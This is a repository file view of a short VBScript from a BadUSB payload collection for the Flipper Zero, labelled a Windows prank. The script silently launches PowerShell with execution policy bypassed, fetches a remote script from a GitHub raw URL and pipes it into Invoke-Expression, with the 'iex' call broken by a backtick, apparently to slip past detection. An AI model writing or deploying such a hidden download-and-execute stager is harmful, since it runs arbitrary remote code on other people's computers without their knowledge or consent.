Files
BadUSB-Files-For-FlipperZero/Windows-Idiot-Prank/idiot.vbs
2024-05-30 21:26:27 +00:00

5 lines
247 B
Plaintext

Set WshShell = WScript.CreateObject("WScript.Shell")
WScript.Sleep 200
WshShell.Run "powershell.exe -Ep Bypass -C irm https://raw.githubusercontent.com/beigeworm/BadUSB-Files-For-FlipperZero/main/Windows-Idiot-Prank/main.ps1 | i`ex", 0, True